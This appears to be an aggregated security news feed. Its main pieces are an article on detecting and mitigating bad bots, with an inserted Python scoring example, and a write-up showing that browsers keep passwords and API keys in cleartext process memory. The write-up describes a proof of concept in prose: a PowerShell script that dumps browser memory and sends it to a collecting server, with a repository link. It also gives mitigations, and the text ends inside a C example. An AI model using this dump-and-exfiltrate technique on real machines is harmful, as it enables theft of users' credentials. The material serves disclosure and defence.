Even with tools like Akamai Bot Manager and Cloudflare Bot Management, the evasion of JavaScript challenges and high traffic volumes made detection increasingly resource-intensive.

How Bots Make Life Difficult for Website Owners

Bots complicate operations for website owners in various ways:

1. Performance Degradation:
· High traffic from bots causes slower page load times or outright server crashes
· Overloaded systems during peak periods, such as holiday sales, result in lost revenue
2. Analytics Distortion:
· Bots inflate metrics like page views, making it difficult to assess genuine user engagement
· Marketing campaigns based on skewed data may lead to poor ROI
3. Fraudulent Activities:
· Credential stuffing, inventory hoarding, and fake account creation drain organizational resources
· Carding bots test stolen credit cards, causing financial loss and reputational damage
4. Escalating Costs:
Detecting and mitigating bots requires expensive tools, increasing operational overhead.

Key Mechanisms in Bot Detection

Modern anti-bot solutions employ a multi-layered approach to differentiate bots from legitimate users:

1. Behavioral Analysis: Solutions monitor and analyze traffic patterns, user actions, and session flows. For example, bots often bypass genuine workflows (like navigating through a website) and directly request endpoints or URLs. Machine learning models are trained on these behaviors to identify anomalies.
2. Device and Browser Fingerprinting: Unique attributes of the client device and browser, such as screen resolution, installed plugins, and HTTP headers, are recorded. Suspicious patterns, like identical fingerprints across multiple requests, are flagged.
3. JavaScript Challenges: Many bots fail to execute JavaScript properly. Anti-bot tools use embedded scripts to evaluate client behavior, detecting headless browsers or automated scripts.
4. Behavioral Biometrics: This includes monitoring fine-grained user activities like mouse movements, typing speed, and touch gestures (for mobile devices). Human interactions have organic patterns that are challenging for bots to mimic.
5. Dynamic Challenges:
CAPTCHA and Crypto Challenges: Bots are challenged with tasks that require human-like reasoning or expend computational resources, increasing the cost of attacks. CAPTCHAs-as-a-service has emerged as an underground market, where bots outsource CAPTCHA solving to human solvers or advanced AI.
Private Access Tokens: Emerging techniques like those used by Cloudflare eliminate traditional CAPTCHAs, relying on secure tokens that validate legitimate users based on hardware and software attestations.
6. API and Mobile-Specific Features:
Anti-bot systems evaluate mobile-specific attributes, such as the tilt and posture of the device during interactions, gyroscope data, and app-specific behaviors, to detect automation.
For mobile apps, tools like Akamai’s Bot Manager assess app integrity, session anomalies, and usage patterns to flag bot activity.

Challenges of Older Mobile App Versions

When mobile applications do not enforce mandatory updates, older versions remain susceptible to bot attacks. These outdated apps may lack the latest security patches, like anti-bot scripts or enhanced validation mechanisms. Organizations face a balancing act:

Security Risks: Old versions can be exploited by bots for account takeovers, API abuse, or credential stuffing.
User Experience: Forcing updates too aggressively might alienate users or cause retention issues.

Solutions like Akamai and F5 Distributed Cloud Bot Defense address this by applying centralized bot management across all endpoints, including APIs and mobile app traffic, irrespective of app version.

Commercial Bot Management Solutions and Detection Techniques

Akamai Bot Manager leverages behavioral analysis, device fingerprinting, and machine learning to detect bots effectively. It excels in granular bot categorization and dynamic mitigation strategies.
Cloudflare Bot Management integrates seamlessly with its extensive global edge network. It uses JavaScript challenges, machine learning, and fingerprinting but is also highly reliant on its CDN infrastructure.
Imperva Advanced Bot Protection focuses on client-side integrations for bot detection, employing server-side behavioral analysis and reputation-based filtering.
DataDome emphasizes real-time traffic analysis through machine learning and AI-powered detection, with strong support for mobile and API traffic.
PerimeterX Bot Defender is known for advanced user behavior analytics and employs contextual signals to differentiate between humans and bots effectively.

Deployment Models:
Akamai and Cloudflare are primarily edge-based solutions, benefiting from their CDN capabilities to offer high-speed processing and minimal latency.
Imperva and PerimeterX provide flexible deployment options, including cloud-based, on-premises, or hybrid solutions.
DataDome supports easy SaaS integration, targeting modern application architectures.

Focus Areas:
Akamai and Cloudflare often appeal to enterprises already using their CDN services, offering robust bot protection as an added layer.
Imperva and DataDome are popular in e-commerce and financial services for mitigating sophisticated threats like scraping and credential stuffing.
PerimeterX is a strong choice for applications requiring detailed behavioral analytics.

Challenges and CAPTCHA Management:
CAPTCHA implementations vary; some solutions, like Akamai and Imperva, allow integration with multiple CAPTCHA providers or leverage their proprietary ones.
DataDome prioritizes minimizing user friction with adaptive challenges, and PerimeterX uses “invisible challenges” to reduce disruptions for legitimate users.

Mobile and API Support:
Solutions like DataDome and PerimeterX have advanced support for securing mobile apps and APIs, with capabilities to detect anomalies in API calls or suspicious patterns of mobile app usage.

Reporting and Insights:
DataDome and Akamai are lauded for detailed dashboards and actionable analytics, helping security teams gain insights into bot traffic.
Cloudflare provides streamlined integration with its broader suite but may lack the depth of reporting compared to specialized solutions like PerimeterX.

Pricing and Scalability:
Cloudflare offers competitive pricing with its bundling of bot protection into other services, making it appealing for SMEs.
Akamai, Imperva, and PerimeterX are typically more enterprise-focused, with pricing scaling based on usage and customization.

When a bot is discovered, modern bot mitigation solutions offer a range of flexible response actions. These actions help organizations tailor their defenses based on the bot’s threat level, the application’s sensitivity, and the desired user experience.

Possible Actions when Bots are identified:

1. Deny Request (Hard Block)
Description: The system outright denies the bot’s request by returning an HTTP 403 (Forbidden) status code.
Use Case: Effective against known malicious bots or high-confidence detections of harmful activity (e.g., credential stuffing).
Pros: Direct and clear-cut; stops malicious activity immediately.
Cons: Determined bots may retry from a different IP or leverage proxy pools to evade blocking.

2. Drop Request (Silent Block)
Description: The server silently drops the request without responding, effectively causing a timeout for the bot.
Use Case: Useful for bots that retry aggressively, as it wastes their resources by forcing them to wait.
Pros: Reduces server load by not processing a response; confuses bots.
Cons: May increase retry rates, leading to potential resource exhaustion on the server.

3. Tarpitting
Description: The server intentionally delays its response to the bot, slowing down its operations.
Use Case: Designed to reduce the effectiveness of high-frequency attacks like scraping or brute-force attempts.
Pros: Wastes bot resources and reduces the number of requests they can send in a given time.
Cons: May still consume server resources for extended periods, especially during high traffic.

4. Challenge with CAPTCHA
Description: The system presents a CAPTCHA (e.g., Google reCAPTCHA or hCaptcha) to verify human users.
Use Case: Best suited for medium-confidence detections or scenarios where false positives need to be avoided.
Pros: Reduces the chance of blocking legitimate users; highly effective against simple bots.
Cons: Advanced bots use CAPTCHA-solving services (e.g., 2Captcha) or AI-based solvers to bypass challenges.

5. Serve Static Page
Description: The bot is redirected to a generic static page, often displaying minimal content or error messages.
Use Case: Used for bots scraping dynamic data, such as product pricing or proprietary content.
Pros: Prevents sensitive data from being exposed while conserving backend resources.
Cons: Bots may still access non-critical static content unless actively redirected or monitored.

6. Redirect to Honeypots
Description: Malicious requests are redirected to deceptive endpoints designed to monitor or waste bot resources.
Use Case: Ideal for gathering intelligence on bot behaviors or pre-emptively flagging malicious IPs.
Pros: Offers insights into attack vectors; can waste bot resources without affecting legitimate users.
Cons: Requires careful setup to ensure legitimate users are not inadvertently redirected.

7. Throttling or Rate Limiting
Description: Restricts the frequency of requests from a suspected bot by slowing down or limiting its traffic.
Use Case: Best for scenarios where low-confidence detection is likely, or during high traffic events.
Pros: Reduces server strain and prevents abuse without outright blocking traffic.
Cons: May impact legitimate high-frequency users, such as API consumers.

8. Alert and Monitor
Description: Suspicious activity is logged and flagged for review without taking immediate action against the bot.
Use Case: Useful for low-confidence detections or when tracking bot behavior is prioritized over blocking.
Pros: Provides actionable data without disrupting user experience.
Cons: Does not mitigate immediate threats.

9. Behavioral Adaptation
Description: Some solutions dynamically modify page content or functionality to confuse bots, such as changing form field names or injecting random delays in page loading.
Use Case: Effective against bots using hardcoded or predictable scripts.
Pros: Adds complexity to automated attacks, forcing bot creators to adapt constantly.
Cons: May introduce additional latency or complexity for legitimate users.

10. Mobile-Specific Actions
In mobile apps, bot defense actions often include additional layers:
Verification of Device Integrity: Detect if an app is running on an emulator or a jailbroken/rooted device.
User Interaction Validation: Bots are detected based on anomalies in touch gestures or accelerometer data.
Session Token Revocation: Suspicious sessions are terminated, and reauthentication is required.

Open Source Solutions

Tools and Frameworks

1. ModSecurity: Open-source WAF that provides bot detection and blocking rules. Implementation Example: Use the OWASP CRS (Core Rule Set) to block bot-like patterns in HTTP requests.
2. Fail2Ban: Although primarily designed to prevent brute-force attacks, Fail2Ban can block bots by analyzing server logs for repeated malicious activity.
3. BotSentry: Open-source framework focusing on real-time bot traffic analysis and mitigation.

Advantages and Limitations

Pros: Cost-effective and flexible.
Cons: High technical expertise required for configuration and maintenance.

Conclusion

The evolution of bad bots from simple scripts to sophisticated AI-driven systems illustrates the dynamic and relentless nature of cyber threats. Modern bots pose significant challenges, targeting vulnerabilities across web applications, APIs, and even mobile apps with non-automatic updates. Their ability to mimic human behavior, solve CAPTCHAs through third-party services, and exploit system loopholes makes them a formidable adversary.

Organizations must adopt multi-layered, adaptive bot management strategies to keep pace. While commercial solutions like Akamai Bot Manager, Cloudflare Bot Management, and Imperva Advanced Bot Protection offer robust defenses, they are not without limitations. Open-source alternatives and custom-built solutions provide flexibility and cost-effectiveness but demand significant expertise.

Additionally, website owners face challenges beyond technical defenses, including maintaining user experience while combating bots, dealing with fluctuating bot traffic, and addressing gaps in mobile app updates. Eye-opening statistics — such as bots accounting for nearly half of all internet traffic — highlight the urgent need for comprehensive mitigation measures.

Ultimately, defending against bots is not a one-time effort but an ongoing process requiring innovation, vigilance, and strategic investment. By staying informed and leveraging advanced technologies, businesses can protect their assets, users, and reputations in an increasingly automated and adversarial digital landscape.

Bad Bots: The Unseen Cyber Threat and the Fight to Secure the Internet was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
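The detection mechanisms (behavioral analysis, fingerprinting, JavaScript challenges) and the confidence-tiered response actions the article walks through can be combined into one small scorer. This is an added example, not code from the article or from any of the products it names; the paths, signal weights, thresholds and the traffic sample are constructed assumptions.

```python
"""Multi-signal bot scoring over access-log records, mapped to the response
actions listed in the article (deny, CAPTCHA challenge, throttle, monitor).

Added example, not code from the article or any vendor product. It applies
three of the detection mechanisms described above to constructed traffic:
behavioral analysis (request rate, and skipping the normal page workflow to
hit endpoints directly), fingerprint reuse across many clients, and failed
JavaScript challenges. Paths, weights and thresholds are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Request:
    ts: float          # seconds since start of the capture
    client: str        # client key (IP here; a session id works too)
    path: str
    fingerprint: str   # device/browser fingerprint hash
    js_ok: bool        # passed the embedded JavaScript challenge


@dataclass
class Verdict:
    client: str
    score: float
    signals: List[str]
    action: str


ENTRY_PATHS = {"/", "/login"}                     # pages humans load before acting
SENSITIVE_PATHS = {"/api/login", "/api/prices"}   # endpoints bots request directly
WEIGHTS = {"rate": 0.4, "bypass": 0.3, "fp_reuse": 0.3, "js_fail": 0.4}
RATE_LIMIT = 20        # requests per client per window before "rate" fires
WINDOW_SECONDS = 60
FP_SHARE_LIMIT = 3     # distinct clients that may legitimately share one fingerprint


def max_in_window(reqs: List[Request]) -> int:
    """Largest number of requests (sorted by ts) inside any WINDOW_SECONDS span."""
    best = start = 0
    for end in range(len(reqs)):
        while reqs[end].ts - reqs[start].ts > WINDOW_SECONDS:
            start += 1
        best = max(best, end - start + 1)
    return best


def choose_action(score: float) -> str:
    """Confidence-tiered response: block only high-confidence detections."""
    if score >= 0.8:
        return "deny"        # hard block, HTTP 403
    if score >= 0.5:
        return "challenge"   # CAPTCHA: medium confidence, avoid false positives
    if score >= 0.3:
        return "throttle"    # rate limit: low confidence or heavy legitimate use
    return "monitor"         # log and watch, no user-visible action


def score_clients(requests: List[Request]) -> Dict[str, Verdict]:
    by_client: Dict[str, List[Request]] = defaultdict(list)
    fp_clients: Dict[str, set] = defaultdict(set)
    for r in requests:
        by_client[r.client].append(r)
        fp_clients[r.fingerprint].add(r.client)

    verdicts = {}
    for client, reqs in by_client.items():
        reqs.sort(key=lambda r: r.ts)
        signals = set()
        paths = {r.path for r in reqs}
        if max_in_window(reqs) > RATE_LIMIT:
            signals.add("rate")
        # Workflow bypass: sensitive endpoint hit without ever loading an entry page.
        if paths & SENSITIVE_PATHS and not paths & ENTRY_PATHS:
            signals.add("bypass")
        if any(len(fp_clients[r.fingerprint]) > FP_SHARE_LIMIT for r in reqs):
            signals.add("fp_reuse")
        if any(not r.js_ok for r in reqs):
            signals.add("js_fail")
        score = min(1.0, sum(WEIGHTS[s] for s in signals))
        verdicts[client] = Verdict(client, score, sorted(signals), choose_action(score))
    return verdicts


def sample_traffic() -> List[Request]:
    """Constructed capture: one human, one stuffing bot, a scraper pool, one heavy API user."""
    reqs = [Request(0, "10.0.0.1", "/", "fp-h1", True),
            Request(5, "10.0.0.1", "/login", "fp-h1", True),
            Request(9, "10.0.0.1", "/api/login", "fp-h1", True)]
    # Credential stuffing: 30 direct login posts in 30 s, no page loads, no JS.
    reqs += [Request(100 + i, "203.0.113.7", "/api/login", "fp-bot", False) for i in range(30)]
    # Scraper pool: four IPs, modest rate each, but one shared fingerprint.
    for n, ip in enumerate(["198.51.100.1", "198.51.100.2", "198.51.100.3", "198.51.100.4"]):
        reqs += [Request(200 + n * 10 + i, ip, "/api/prices", "fp-pool", True) for i in range(5)]
    # Legitimate high-frequency API consumer: fast, but a real browser with a normal workflow.
    reqs.append(Request(300, "192.0.2.9", "/", "fp-api", True))
    reqs += [Request(301 + i, "192.0.2.9", "/api/prices", "fp-api", True) for i in range(25)]
    return reqs


if __name__ == "__main__":
    for v in score_clients(sample_traffic()).values():
        print(f"{v.client:14} score={v.score:.1f} action={v.action:9} signals={v.signals}")
```

The heavy but legitimate API consumer lands on "throttle" rather than "deny", which is the false-positive trade-off the article notes under rate limiting.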
by InfoSec Write-ups
2024-11-18 06:43:32
Inside a Fictitious Cyber Breach: Artemis’ IT Vulnerability Report
Modern-Day Cybersecurity Attack
Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-11-18 05:40:15
Navigating the compliance labyrinth: A CSO’s guide to scaling security
Imagine navigating a labyrinth where the walls constantly shift, and the path ahead is obscured by fog. If this brings up a visceral image, you’ve either seen David Bowie’s iconic film or are very familiar with the real-world challenge of compliance in today’s fast-paced business environment. Just as in the labyrinth, where every turn can lead to unexpected challenges or opportunities, companies face a complex maze of regulatory requirements. As a CSO, your role demands … More → The post Navigating the compliance labyrinth: A CSO’s guide to scaling security appeared first on Help Net Security.
by Help Net Security
2024-11-18 05:30:21
Transforming code scanning and threat detection with GenAI
In this Help Net Security interview, Stuart McClure, CEO of Qwiet AI, discusses the evolution of code scanning practices, highlighting the shift from reactive fixes to proactive risk management. McClure also shares his perspective on the future of AI-driven code scanning, emphasizing the potential of machine learning in threat detection and remediation. How have you observed code scanning practices evolve in recent years, especially with cloud adoption and DevSecOps? Code scanning has come a long … More → The post Transforming code scanning and threat detection with GenAI appeared first on Help Net Security.
by Help Net Security
2024-11-18 05:00:22
Evaluating GRC tools
According to Gartner, the broad range of pricing for government, risk, and compliance (GRC) tools requires enterprise risk management (ERM) leaders to be well-versed in distinct pricing tiers of GRC solutions. In this Help Net Security video, Joel Backaler, Director/Analyst, Risk Technology & Analytics at Gartner, discusses how ERM leaders consider several critical questions to determine which GRC solution tier best aligns with their needs. The post Evaluating GRC tools appeared first on Help Net Security.
by Help Net Security
2024-11-18 05:00:00
Countering multidimensional threats: lessons learned from the 2024 election
In 2024, election officials and law enforcement shared intelligence closely to counter complex threats.
by Cybersecurity Dive
2024-11-18 04:30:52
ScubaGear: Open-source tool to assess Microsoft 365 configurations for security gaps
ScubaGear is an open-source tool the Cybersecurity and Infrastructure Security Agency (CISA) created to automatically evaluate Microsoft 365 (M365) configurations for potential security gaps. ScubaGear analyzes an organization’s M365 tenant configuration, offering actionable insights and recommendations to help administrators address security gaps and strengthen defenses within their Microsoft 365 environment. The private sector, critical infrastructure, and all levels of government utilize the tool. ScubaGear’s reports guide organizations in quickly identifying and addressing configuration vulnerabilities, reducing … More → The post ScubaGear: Open-source tool to assess Microsoft 365 configurations for security gaps appeared first on Help Net Security.
by Help Net Security
2024-11-18 04:00:14
How and where to report cybercrime: What you need to know
Cybercrime reporting mechanisms vary across the globe, with each country offering different methods for citizens to report cybercrime, including online fraud, identity theft, and other cyber-related offenses. Victims are usually instructed to complete an online form that asks for personal details, a description of the crime, and any collected evidence. While online reporting forms are commonly used, in certain situations it may be more effective to visit a local police station and report the crime … More → The post How and where to report cybercrime: What you need to know appeared first on Help Net Security.
by Help Net Security
2024-11-18 00:00:00
ZDI-24-1512: Progress Software WhatsUp Gold getReport Missing Authentication Authentication Bypass Vulnerability
This vulnerability allows remote attackers to bypass authentication on affected installations of Progress Software WhatsUp Gold. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2024-7763.
by Zero Day Initiative Advisories
2024-11-17 14:45:44
SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 20
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. New Campaign Uses Remcos RAT to Exploit Victims Bengal cat lovers in Australia get psspsspss’d in Google-driven […]
by Security Affairs
2024-11-17 14:13:14
Security Affairs newsletter Round 498 by Pierluigi Paganini – INTERNATIONAL EDITION
A new round of the weekly SecurityAffairs newsletter has arrived! Every week the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. A botnet exploits a GeoVision zero-day to compromise EoL devices Palo Alto Networks confirmed active exploitation of recently […]
by Security Affairs
2024-11-17 11:25:36
Phishing emails increasingly use SVG attachments to evade detection
Threat actors increasingly use Scalable Vector Graphics (SVG) attachments to display phishing forms or deploy malware while evading detection. [...]
by BleepingComputer
2024-11-17 10:19:29
Security plugin flaw in millions of WordPress sites gives admin access
A critical authentication bypass vulnerability has been discovered impacting the WordPress plugin 'Really Simple Security' (formerly 'Really Simple SSL'), including both free and Pro versions. [...]
by BleepingComputer
2024-11-17 09:00:24
Week in review: Microsoft patches actively exploited 0-days, Amazon and HSBC employee data leaked
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft fixes actively exploited zero-days (CVE-2024-43451, CVE-2024-49039) November 2024 Patch Tuesday is here, and Microsoft has dropped fixes for 89 new security issues in its various products, two of which – CVE-2024-43451 and CVE-2024-49039 – are actively exploited by attackers. Massive troves of Amazon, HSBC employee data leaked A threat actor who goes by the online moniker “Nam3L3ss” has leaked … More → The post Week in review: Microsoft patches actively exploited 0-days, Amazon and HSBC employee data leaked appeared first on Help Net Security.
by Help Net Security
2024-11-17 08:23:40
Beyond AI: The Evolving Face of Cybersecurity in 2024 and the Rise of Autonomous Defense Systems
In 2024, the cybersecurity landscape is at a pivotal moment, shaped by rapid technological advancements and the increasing sophistication of cyber threats. The rise of […]
by Privacy Affairs
2024-11-17 04:52:41
A botnet exploits a GeoVision zero-day to compromise EoL devices
A botnet employed in DDoS or cryptomining attacks is exploiting a zero-day in end-of-life GeoVision devices to grow. Researchers at the Shadowserver Foundation observed a botnet exploiting a zero-day in GeoVision EOL (end-of-life) devices to compromise devices in the wild. The GeoVision zero-day, tracked as CVE-2024-11120 (CVSS 9.8), is a pre-auth command injection vulnerability […]
by Security Affairs
2024-11-17 00:00:00
The Okta bcrypt Security Incident and The Bun vs Node.js Angle in Secure By Design
Even if you follow security best practices and choose bcrypt for password hashing, you can still get it wrong. How does Bun handle it in a more secure fashion? What happened with the Okta bcrypt incident? Let's dive in.
by Node.js Security
2024-11-16 20:09:03
Google’s Gemini AI Chatbot Keeps Telling Users to Die
Google’s Gemini AI Chatbot faces backlash after multiple incidents of it telling users to die, raising concerns about…
by Hackread
2024-11-16 19:17:27
Critical Authentication Bypass Flaw Affects 4 Million WordPress Sites
A highly dangerous vulnerability in the Really Simple Security plugin, affecting over 4 million WordPress websites, has been disclosed by Wordfence. The flaw, rated with a CVSS score of 9.8 (critical), allows attackers to bypass authentication and gain administrative control over affected sites. Both free and premium versions of the plugin, previously known as Really … The post Critical Authentication Bypass Flaw Affects 4 Million WordPress Sites appeared first on CyberInsider.
by Cyber Insider
2024-11-16 18:54:58
Browser’s Secret Diary: Memory Dumps Unveiled

Introduction: How Browsers Handle Your Data Insecurely

Are you browsing on Chrome, Firefox, Brave, or Edge? It might feel safe, but what if I told you that everything you do in those browsers (passwords, credit card details, and sensitive data) could be stolen by a ‘local attacker’? Sounds a bit anticlimactic, right? After all, couldn’t an attacker just install a keylogger or use remote desktop control?

Sure, keyloggers and remote desktop tools can capture what you type or click in real time. But what if the sensitive data isn’t something you directly input, but information sent by the server for you to view only? A keylogger wouldn’t catch that. Now imagine that even after you stop actively browsing and forget to terminate your browser.exe, your browser’s memory still contains sensitive data from the entire session, including historical information stored since you first opened it, and including what you had in an Incognito tab. With that much access, a simple keylogger becomes obsolete.

The Holy Grave: Cleartext Storage in Memory

So let me introduce you to the premise of this article, CWE-316: Cleartext Storage of Sensitive Information in Memory. Let’s dive in to understand how this works and why the issue, which clearly exists in so many thick clients, is such a pain to mitigate.
https://cwe.mitre.org/data/definitions/316.html (CWE-316: Cleartext Storage of Sensitive Information in Memory)

Let’s get a general idea of how memory works in Windows and how data is stored in it. Consider the example of typing a word on a website in your browser.

<skip this if you already know it; I didn’t, so maybe you’re like me>

When you open the browser, the Windows operating system loads browser.exe into memory. This involves mapping the program’s executable file into the process’s virtual address space. The OS allocates resources (memory, CPU time, etc.) to the browser process. The OS allocates memory pages (chunks of memory) to the browser process. Windows uses virtual memory, so these pages correspond to virtual addresses initially and are later mapped to physical RAM. The browser initializes by loading its configuration settings, resources, and any cached data (like cookies) from previous sessions. These are loaded into memory as well.

When you access Google, the browser loads the Google search page. This involves downloading the HTML, CSS, and JavaScript for the page, which are then rendered to create the Document Object Model (DOM) in memory. The DOM is a structured representation of the web page, stored as a tree of objects in the browser’s memory. The rendering engine handles how the page looks on the screen, while JavaScript is responsible for any dynamic functionality, such as auto-suggest for search terms. This JavaScript code is executed in the browser’s JavaScript engine, and the relevant objects, functions, and variables are stored in memory.

As you start typing, each letter you input is temporarily stored in a buffer. The OS manages this with input/output (I/O) operations through low-level drivers. This buffer is then used by the browser to display the text in the search bar. The browser stores your input in its memory, in a section allocated for handling the DOM and related interactions. The input data, like the search term you entered, is stored as a string object in memory. Now this input could be anything: a password, an email, a phone number, or a sensical search like “How to hack nasa with html ???”

<this is where your skipping ends, mate, if you knew the shenanigans>

When you press “Enter” or click the action button or placeholder, the browser prepares an HTTP request to the website’s servers, containing your valuable information. The request includes headers and your string, which are stored temporarily in the memory buffer while the request is sent. The response comes back from the server and voilà, you see what you wanted with the string you entered. When you close the browser, Windows receives a termination signal from browser.exe. This signals the OS to begin releasing resources tied to the browser process. Deallocating virtual memory: Windows clears the virtual memory allocated to the browser, deallocating any memory pages and marking them as free.

So you don’t see a problem? Well, the issue starts with two conditions which are generally true for most browsers:
You run browser.exe with low privileges.
Hence you are able to dump the memory of processes related to browser.exe.

To understand the problem, let’s open Firefox 132.0.2, browse to google.com in a tab, and then open PayPal in an incognito tab. Here’s our google.com that we might use later, but now I have to complete some payments, so I open up PayPal in the incognito tab. I input my credentials and log in to my account, which you’re not allowed to see! Then I log out of PayPal and close the incognito tab when my task with PayPal is complete. I leave the browser open with Google in a tab, thinking I will later have to search something up, like how to secure my password? This is an absurd abstraction of the idea, but hey, when was the last time you closed all the tabs of your browser when you’re committed to working a long shift?

Now I fire up the portable version of Process Hacker and view the properties of the parent process of all the other Firefox children (which I will explain very soon). So we go Properties > Memory > Strings > Filter > Contains, and I input the password which I used for the PayPal login. As we hit enter we can see that the password is still present in memory even though we have closed the tab related to it. The password is in plaintext in memory. We can also repeat the same with our email and find that the data is still stored in memory. Now we can clearly see that the data we gave as input is saved in the memory of the process even after we have closed the tab associated with it, which effectively closes the child process associated with that particular tab.

But now let’s have a look at the data which we get from the server side. We will open a page which might contain some sensitive data; for example, here I will open a documentation page with a sample Firebase API key. We will repeat the same process of keeping an idle tab and closing the tab in which we opened the webpage with the API key. Now we look in Process Hacker for the key in memory, and we can successfully find the API key in plaintext in the memory of the parent process.

Securely Sandboxed? But from Whom?

Now there are a lot of questions popping up, like understanding how a browser works and the “sandboxing” on which we rely so much for keeping us secure. Pressing Shift + Esc in all the browsers generally opens the browser’s Process Manager / Task Manager, where we can see the PID related to different tasks.

Diagram of processes used by Firefox. All child processes are spawned and managed by the Parent process. (Source: Process Model, Firefox Source Docs) https://firefox-source-docs.mozilla.org/dom/ipc/process_model.html

Here is a brief overview of what these processes do:
Parent Process: Manages UI, handles privileged operations, and coordinates resource allocation and IPC (Inter-Process Communication).
Content Process: Runs web content in sandboxed environments for security and stability, separating each tab into distinct processes.
GPU Process: Offloads all graphics rendering tasks to the GPU, improving rendering efficiency and reducing main process load.
WebExtension Process: Isolates extensions from core operations to minimize potential risks from third-party code.
RDD (Remote Data Decoder) Process: Handles media decoding, offloading tasks to enhance performance and security for media playback.
Socket Process: Manages network socket connections independently of content processes, enhancing network security and reliability.
Finally we have processes related to each active web connection you make from the browser, each opened separately in an individual child process.

General visualization of how different websites are opened in different processes.

Browser sandboxing is often misunderstood as a guarantee that all code within the browser runs in a secure, isolated environment. However, a more accurate view is that the processes handling different browser tabs are isolated from each other. But an external process outside the browser could still potentially access the memory contents of these browser processes. This means that, while browser tabs are isolated by sandboxing, the overall sandbox isn’t impervious to external processes accessing its memory.

You might think that this is an issue related to Firefox, but upon checking all the popular browsers, the result remains the same.

Browsers tested (15/11/2024):
Google Chrome Version 131.0.6778.70
Brave Version 1.73.89
Firefox 132.0.2
Edge Version 131.0.2903.48

Scenario: What an Attacker Can Do

Now let’s see the perspective from which a potential malicious actor could abuse this weakness. Here is the whole implementation, which is a simple proof of concept far from what an APT group would come up with. GitHub repo: https://github.com/Shauryae1337/Browser-Memory-Exfiltration/

So we have a PowerShell script which does exactly what VirusTotal has predicted! But we still have the antivirus vendors thinking “Yeah, we can allow that for sure!” We have an exploit.ps1 which does the above mentioned. Then we have a server which receives the memory dump and stores it. Once we have the memory dump we can proceed with extracting strings or even files, since due to ASLR the dump is a jumbled treasure of your browser activity and the information it contains. For proof of concept I have added a script which can analyze the strings extracted and dig out some information such as phone numbers, emails and domains along with their frequency of appearance. Extracting information might take a while since we have to do a lot of regular expressions, frequency analysis and removal of duplicates. We can enhance the information extraction over time with enough research.

My email, which I use for all public interactions, is at the top, along with some data that fits the regex used for filtering the data and the frequency count. Some of the phone numbers and IP addresses which were found in the dump. The most found domains in my activity, where an attacker would certainly look for crucial websites. We can also use other tools like the Volatility framework or binwalk to extract more data, depending on the caliber of the actor’s forensic knowledge.

Mitigations which Aren’t Mitigating the Issue

When we talk about mitigation there are two very good points to start with:
A. Encrypting data in memory
B. Clearing data once it has been used

So here are two examples which we can use to create a simple sample program which can store our data in memory safely and return it upon request. I have attached the source code for the mitigations in the repo:

Mitigation 1: XOR Encryption with VirtualLock and Secure Memory Allocation

While XOR encryption (or any other encryption) by itself is not considered secure for protecting sensitive data, combining it with non-pageable memory allocation and memory locking can offer some protection for data in transit or for temporary storage. You might replace the XOR with any other form of encryption. Here’s how to mitigate risks using this approach:
Allocate non-pageable memory
Read and store sensitive data
Encrypt data in memory
Zero out the original plaintext
Free and unlock memory
Store and handle encrypted data
Decrypt data (if needed)
Secure memory erasure

Mitigation 2: Using DPAPI (Data Protection API) for Encryption

The Data Protection API (DPAPI) provides a secure, high-level solution for protecting sensitive data using encryption mechanisms built into the Windows operating system. This method should be preferred for handling sensitive data securely, as it leverages established cryptographic protocols and Windows key management features. The method is also better than the one mentioned in Mitigation 1, but is platform dependent. Here’s how to mitigate risks using this approach:
Allocate memory for sensitive data
Read and store sensitive data
Encrypt data using DPAPI
Zero out plaintext after encryption
Free and unlock memory (if locked)
Store or use encrypted data
Decrypt data when needed
Secure memory erasure

Checking the same attack against the mitigations, we don’t find the secure string lying around in memory in plaintext for long. But we have a very simple program as an example; what about something which has such a large amount of data to hold, like a `Browser`? Will it be viable to create a browser which performs all the mitigations without a huge impact on performance? Well, we don’t have exact answers yet since I haven’t found a browser which does so, and maybe the reason is that it’s not viable to create such a browser without specific support from the operating system. But that’s a subject for another article in the future; please pardon me if my understanding of the concept mentioned above lacks a bit, and let me know if you have something to add.

Finally

PRO TIP: Close all the windows of your browser once you have completed your work. (Terminate all the processes.)

If you want to update me on some root cause analysis of the V8 JavaScript engine, Firefox, and the Chromium project about how and why browsers have to keep the data in plaintext in memory even after a tab is closed, then let me know. Email: shaurya1337@gmail.com LinkedIn: https://www.linkedin.com/in/shaurya-na-725687209/ Here is all the source code: https://github.com/Shauryae1337/Browser-Memory-Exfiltration/

Thank you so much for helping me with framing the article and all the motivation behind it! Ramya Shah https://www.linkedin.com/in/ramyashah Sahil Shah https://www.linkedin.com/in/sahilshah3276

Browser’s Secret Diary: Memory Dumps Unveiled was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
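Mitigation 1 as an added example, not code from the article or its repository: a small sealed-buffer type in C that allocates locked, non-pageable memory (VirtualAlloc/VirtualLock on Windows, posix_memalign/mlock elsewhere so it also builds on Linux), XOR-encrypts the secret in place, wipes the caller's plaintext, decrypts only on demand, and securely erases on release. The type and function names (secret_buf, secret_seal, secret_open, secret_wipe, buffer_contains) are assumptions, and the XOR keystream is a placeholder for a real cipher, as the article itself says.

```c
/* Added example, not from the article's repo. secret_buf and its functions
 * are names assumed here. The XOR keystream stands in for a real cipher;
 * use an authenticated cipher or DPAPI for anything beyond a demo. */
#ifdef _WIN32
#define _CRT_RAND_S              /* exposes rand_s in <stdlib.h> */
#else
#define _POSIX_C_SOURCE 200809L  /* exposes mlock, posix_memalign, sysconf */
#endif
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#include <unistd.h>
#endif

typedef struct {
    uint8_t *data;   /* locked buffer: plaintext briefly, then ciphertext */
    uint8_t *key;    /* locked buffer holding the XOR keystream */
    size_t   len;
    int      sealed; /* 1 once data holds ciphertext only */
} secret_buf;

/* Overwrite through a volatile pointer so the compiler cannot drop the wipe. */
static void secure_zero(void *p, size_t n) {
    volatile uint8_t *v = (volatile uint8_t *)p;
    while (n--) *v++ = 0;
}

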